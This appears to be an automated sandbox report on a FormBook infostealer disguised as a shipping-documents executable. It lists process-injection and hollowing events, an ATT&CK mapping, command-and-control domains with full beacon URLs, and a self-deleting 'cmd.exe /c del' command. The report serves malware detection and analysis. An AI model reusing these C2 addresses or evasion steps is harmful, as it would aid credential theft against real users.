          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04823D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04863540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04807D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04828EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04818E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04803A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04824A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04874257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_10001548 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.maluss.com
          Source: C:\Windows\explorer.exeDomain query: www.magnumopuspro.com
          Source: C:\Windows\explorer.exeDomain query: www.exclusiveflooringcollection.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Users\user\Desktop\202139769574 Shipping Documents.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: D20000
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: explorer.exe, 00000004.00000000.654816016.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.655818180.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.672439987.0000000005E50000.00000004.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.655818180.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.655818180.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.681240089.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara matchFile source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara matchFile source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules (1) | Path Interception | Access Token Manipulation (1) | Rootkit (1) | Credential API Hooking (1) | Query Registry (1) | Remote Services | Credential API Hooking (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection (512) | Virtualization/Sandbox Evasion (3) | LSASS Memory | Security Software Discovery (131) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Access Token Manipulation (1) | Security Account Manager | Virtualization/Sandbox Evasion (3) | SMB/Windows Admin Shares | Clipboard Data (1) | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (512) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (12) | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Remote System Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (3) | Cached Domain Credentials | File and Directory Discovery (2) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing (11) | DCSync | System Information Discovery (13) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

          Behavior Graph

          Behavior Graph ID: 403523, Sample: 202139769574 Shipping Docum..., Startdate: 04/05/2021, Architecture: WINDOWS, Score: 100
          Start: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures
            202139769574 Shipping Documents.exe (started): dropped C:\Users\user\AppData\...\22m80anrrsp.dll, PE32; Maps a DLL or memory area into another process
              202139769574 Shipping Documents.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe (injected): shops.myshopify.com 23.227.38.74, 49754, 80 CLOUDFLARENETUS Canada; www.maluss.com; 4 other IPs or domains; System process connects to network (likely due to code injection or exploit)
                  mstsc.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)
                      conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          202139769574 Shipping Documents.exe | 33% | Virustotal |
          202139769574 Shipping Documents.exe | 32% | ReversingLabs | Win32.Trojan.Injexa
          202139769574 Shipping Documents.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.0.202139769574 Shipping Documents.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.2.202139769574 Shipping Documents.exe.3070000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.1.202139769574 Shipping Documents.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.2.202139769574 Shipping Documents.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.0.202139769574 Shipping Documents.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.2.202139769574 Shipping Documents.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366

          Domains

          Source | Detection | Scanner | Label
          shops.myshopify.com | 0% | Virustotal |
          www.maluss.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.exclusiveflooringcollection.com/nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw | 0% | Avira URL Cloud | safe
          http://www.maluss.com/nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          www.magnumopuspro.com/nyr/ | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          shops.myshopify.com | 23.227.38.74 | true | true | | unknown
          ext-sq.squarespace.com | 198.185.159.144 | true | false | | high
          www.maluss.com | unknown | unknown | true | | unknown
          www.magnumopuspro.com | unknown | unknown | true | | unknown
          www.exclusiveflooringcollection.com | unknown | unknown | true | | unknown

                Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.exclusiveflooringcollection.com/nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw | true | Avira URL Cloud: safe | unknown
          http://www.maluss.com/nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw | true | Avira URL Cloud: safe | unknown
          www.magnumopuspro.com/nyr/ | true | Avira URL Cloud: safe | low

                URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | | high
          http://nsis.sf.net/NSIS_ErrorError | 202139769574 Shipping Documents.exe | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.carterandcone.coml | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.typography.netD | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://fontfabrik.com | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | | high
          http://nsis.sf.net/NSIS_Error | 202139769574 Shipping Documents.exe | false | | high
          http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.%s.comPA | explorer.exe, 00000004.00000002.909702700.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
          http://www.fonts.com | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sakkal.com | explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                        Contacted IPs


                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACEUS | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true

                                        General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 403523
Start date: 04.05.2021
Start time: 07:02:25
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 27s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 202139769574 Shipping Documents.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/4@3/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 19.3% (good quality ratio 17.4%)
• Quality average: 74.1%
• Quality standard deviation: 32%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

Match | Associated Sample Name / URL | Detection | Context
198.185.159.144
  S4qfwZnR6X.exe | malicious
    • www.silhouettebodyspa.com/de92/?tHul=fdfLpdbpF&pPj8qlK=aW4bwX+7+rq/lVtFlzifkf7EnMQHuKASlHyg88U21n5YYvOPVn8iR8TT3SxMPq5PboHve2hfIg==
  d801e424_by_Libranalysis.docx | malicious
    • www.thebluefishhotel.net/qjnt/?h48x=QMUGPevm6Irjo8oPFEVzH6HtR6H2zoEQzpkVeMV2m2AjEhovI/wxUHuwVe7nA2+6+ZBUHg==&BZz=llM0X6
  PO_29_00412.exe | malicious
    • www.missmaltese.com/hw6d/?wR9=6RCAxHzHs2U8cKrh6h9/ydGjrhxnSTzcOHDfHkTTDkA8hCV/5sMta/cQsHNALet3pcHc&3f=ZlLd8r8PtX
  triage_dropped_file.exe | malicious
